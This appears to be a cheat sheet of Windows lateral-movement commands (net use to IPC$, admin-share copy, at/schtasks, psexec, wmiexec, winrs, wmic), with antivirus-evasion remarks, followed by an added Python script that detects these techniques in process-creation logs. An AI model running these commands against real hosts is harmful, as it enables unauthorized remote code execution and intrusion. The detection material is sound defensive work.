Lateral movement: executing commands on remote hosts

Windows

IPC$ & copy & at & schtasks

net use \\127.0.0.1\ipc$ "password" /user:Administrator
copy c:\test.bat \\127.0.0.1\c$\windows\temp\test.bat
## Windows 2003 and earlier:
at \\127.0.0.1 22:00 c:\windows\temp\test.bat
## Windows 7 and later:
schtasks /create /s 127.0.0.1 /sc once /st 22:00 /tn test /tr c:\windows\temp\test.bat /ru system

psexec

## Evades AV (signed with a Microsoft certificate), but creates a PsExec service on the remote host
## interactive mode
psexec -accepteula \\127.0.0.1 -u Administrator -p password -s cmd

## single-command mode
psexec -accepteula \\127.0.0.1 -u Administrator -p password -s "c:\windows\temp\test.bat"

wmiexec

## Drawback: does not evade AV, and writes a DLL into the default C: drive directory
## interactive mode
cscript.exe //nologo wmiexec.vbs /shell 127.0.0.1 Administrator password

## single-command mode
cscript.exe wmiexec.vbs /cmd 127.0.0.1 Administrator password "whoami"

winrs

## Applies to Windows Server 2016, Windows Server 2012 R2 and Windows Server 2012
winrs -r:pcname command

wmic

WMIC /node:ComputerName process call create "cmd.exe /c start.exe"
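Every technique above leaves a distinctive command line in process-creation telemetry (Security event 4688 or Sysmon event 1) on the host the attacker launches from. The following detection script is an added example, not part of the original page: it matches such command lines against patterns for each listed technique and runs over a constructed set of sample events (hostnames, users and addresses are made up).

```python
import re

# One regex per remote-execution technique listed on this page, applied to the
# CommandLine field of process-creation events (Security 4688 / Sysmon 1).
TECHNIQUES = {
    "ipc_share_mount": re.compile(r"\bnet\s+use\s+\\\\[^\\\s]+\\ipc\$", re.I),
    "admin_share_copy": re.compile(r"\bcopy\b.*\\\\[^\\\s]+\\[a-z]\$\\", re.I),
    "at_remote": re.compile(r"\bat(\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}", re.I),
    "schtasks_remote": re.compile(r"\bschtasks(\.exe)?\s+/create\b.*\s/s\s+\S+", re.I),
    "psexec": re.compile(r"\bpsexec(64)?(\.exe)?\s+.*\\\\\S+", re.I),
    "wmiexec_vbs": re.compile(r"\bcscript(\.exe)?\s+.*wmiexec\.vbs\s+/(shell|cmd)\b", re.I),
    "winrs_remote": re.compile(r"\bwinrs(\.exe)?\s+-r:\S+", re.I),
    "wmic_remote_create": re.compile(r"\bwmic(\.exe)?\s+/node:\S+.*\bprocess\s+call\s+create\b", re.I),
}


def classify(command_line):
    """Return the names of every listed technique whose pattern matches this command line."""
    return [name for name, rx in TECHNIQUES.items() if rx.search(command_line)]


def scan(events):
    """events: iterable of (hostname, user, command_line) tuples; yields one alert per match."""
    for host, user, cmd in events:
        hits = classify(cmd)
        if hits:
            yield {"host": host, "user": user, "techniques": hits, "command": cmd}


# Constructed sample process-creation events (not real telemetry); the last two are benign.
SAMPLE_EVENTS = [
    ("ws01", "CORP\\alice", 'net use \\\\10.0.0.5\\ipc$ "password" /user:Administrator'),
    ("ws01", "CORP\\alice", "copy c:\\test.bat \\\\10.0.0.5\\c$\\windows\\temp\\test.bat"),
    ("ws01", "CORP\\alice", "schtasks /create /s 10.0.0.5 /sc once /st 22:00 /tn test /tr c:\\windows\\temp\\test.bat /ru system"),
    ("ws02", "CORP\\bob", "psexec -accepteula \\\\10.0.0.5 -u Administrator -p password -s cmd"),
    ("ws02", "CORP\\bob", "cscript.exe //nologo wmiexec.vbs /shell 10.0.0.5 Administrator password"),
    ("ws03", "CORP\\carol", "winrs -r:srv01 ipconfig"),
    ("ws03", "CORP\\carol", 'WMIC /node:srv01 process call create "cmd.exe /c start.exe"'),
    ("ws04", "CORP\\dave", "schtasks /query /tn backup"),
    ("ws04", "CORP\\dave", "ipconfig /all"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On the remote side, the PsExec service installation and the scheduled-task creation also generate their own events (service install and task creation logs), so correlating both ends gives higher-confidence alerts than the launching host alone.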